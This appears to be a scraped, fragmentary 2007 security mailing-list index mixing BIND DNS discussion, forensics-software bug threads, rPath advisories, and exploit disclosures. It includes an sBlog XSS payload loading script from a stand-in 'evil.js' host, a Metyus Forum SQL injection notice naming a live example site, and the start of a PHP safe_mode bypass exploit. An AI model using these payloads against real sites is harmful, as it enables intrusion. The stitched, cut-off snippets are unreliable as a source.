On 24 Jul 2007 17:40:35 -, [EMAIL PROTECTED]
[EMAIL PROTECTED] wrote:
I don't exactly see how this is new News since Zalewski's paper on TCP
sequence number analysis (which included analysis of versions of BIND):
http://lcamtuf.coredump.cx/newtcp/
That article does not deal with attacks
they were able to identify six test scenarios, out of "tens of thousands" of
test scenarios run
It only takes one. Plus this statement implies that it's relatively hard to
crash EnCase; anyone that's used it on any regular basis knows that
crashing EnCase is on par with kicking retarded
On Fri, Jul 27, 2007 at 05:03:18AM +, jf wrote:
So here's some truth, you're a forensics software company, one that deals
by and large with LEO, which means you have an incredibly high bar to
fill, if your application is not pristine, all sorts of 'bad people with
good lawyers (tm)' walk
# Bug Names : Metyus Forum Portal v1.0 philboard_forum.asp (id) Sql
İnjection
# script name : Metyus Forum Portal
# For Example Page : http://users1.nofeehost.com/canavartepe/forum/philboard.asp
# Version : 1.0
# Risk : High
# Download : http://aspindir.com/indir.asp?id=3889
# Found By
rPath Security Advisory: 2007-0149-1
Published: 2007-07-27
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Remote System User Deterministic Weakness
Updated Versions:
bind=/[EMAIL PROTECTED]:devel//1/9.3.4_P1-0.1-1
bind-utils=/[EMAIL
This is Paul Vixie's response on this, when I asked him for verification:
-
this bug has been reported over and over again for a dozen years. it's
odd to have to keep fixing it-- i fixed it in bind4 and bind8 when theo
de raadt offered me his random number generator to use. bind9 should've
rPath Security Advisory: 2007-0150-1
Published: 2007-07-27
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
libvorbis=/[EMAIL PROTECTED]:devel//1/1.2.0-0.1-1
References:
iSEC Partners will be presenting our complete results from a research project
into the security of forensics software next week at the BlackHat USA
conference. The technical paper will be available before the talk at 4pm PST
on Wednesday, August 1st at
# sBlog 0.7.3 Beta XSS Vulnerability
# Found by 0x90
# www.0x90.com.ar
# msn mail: [EMAIL PROTECTED]
# in blog
http://host/blog/search.php
# use
'//script src=http://yoursite.com/evil.js
# Welcome to the jungle!
On 24 Jul 2007 17:40:35 -, [EMAIL PROTECTED]
[EMAIL PROTECTED] wrote:
I don't exactly see how this is new News since Zalewski's paper on TCP
sequence number analysis (which included analysis of versions of BIND):
http://lcamtuf.coredump.cx/newtcp/
That article does not deal with
On Thu, Jul 26, 2007 at 11:40:55PM -0500, Gadi Evron wrote:
This is Paul Vixie's response on this, when I asked him for verification:
-
this bug has been reported over and over again for a dozen years. it's
odd to have to keep fixing it-- i fixed it in bind4 and bind8 when theo
de
<?php
#
### PHP Safe_mode bypass exploit (win32service) ###
### ###
### Note: Tested on 5.2.1 ###
### ###
### Author: NetJackal
A white paper about how to counter attack XSS attacks using AJAX
programming techniques
http://barmagy.com/blogs/infinite_loop/archive/2007/07/20/498.aspx
--
Fady Anwar
it's not like this hasn't been reported, and fixed, many times by many
others - so if it's fixed so many times, how come it was still vulnerable,
and ISC had to issue their patches?
Because it's just a 16-bit field. DNS is broken. Cache poisoning will
happen. Those are the facts on the
Tim Newsham wrote:
it's not like this hasn't been reported, and fixed, many times by
many others - so if it's fixed so many times, how come it was still
vulnerable, and ISC had to issue their patches?
Because it's just a 16-bit field. DNS is broken. Cache poisoning will
happen. Those are
Dear List,
This Message is thrown together in a hurry with limited Internet
access, please take my apologies for typos and missing information,
more will follow soon :)
My call for an OSS Bluetooth sniffer during the last 23C3
in Berlin has not been left unanswered, first there was
Max